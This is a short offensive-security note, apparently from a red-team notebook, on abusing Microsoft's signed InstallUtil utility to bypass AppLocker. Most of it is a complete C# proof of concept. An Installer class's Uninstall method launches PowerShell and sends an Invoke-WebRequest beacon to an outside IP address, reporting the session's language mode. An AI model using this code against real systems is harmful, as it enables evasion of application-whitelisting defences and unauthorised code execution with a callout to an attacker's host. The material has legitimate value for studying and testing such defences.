InstallUtil

Overview

InstallUtil is a command line utility which is part of the .NET Framework and allows users to quickly install and uninstall applications via the command prompt. Since this utility is a Microsoft signed binary then it could be used to run any .NET executables bypassing in that way AppLocker restrictions.

Example code

Create C# project utilizing the uninstall method:

using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;

namespace RFC_InstallUtilPwsh
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("These aren't the droids you're looking for.");
        }
    }

    [System.ComponentModel.RunInstaller(true)]
    public class Sample : System.Configuration.Install.Installer
    {
        public override void Uninstall(System.Collections.IDictionary savedState)
        {
            Runspace runspace = RunspaceFactory.CreateRunspace();
            runspace.Open();

            PowerShell powershell = PowerShell.Create();
            powershell.Runspace = runspace;

            string beacon_command = "Invoke-WebRequest -Uri http://192.168.45.208/HelloThere/$($ExecutionContext.SessionState.LanguageMode)";
            powershell.AddScript(beacon_command);
            powershell.Invoke();

            runspace.Close();
        }
    }
}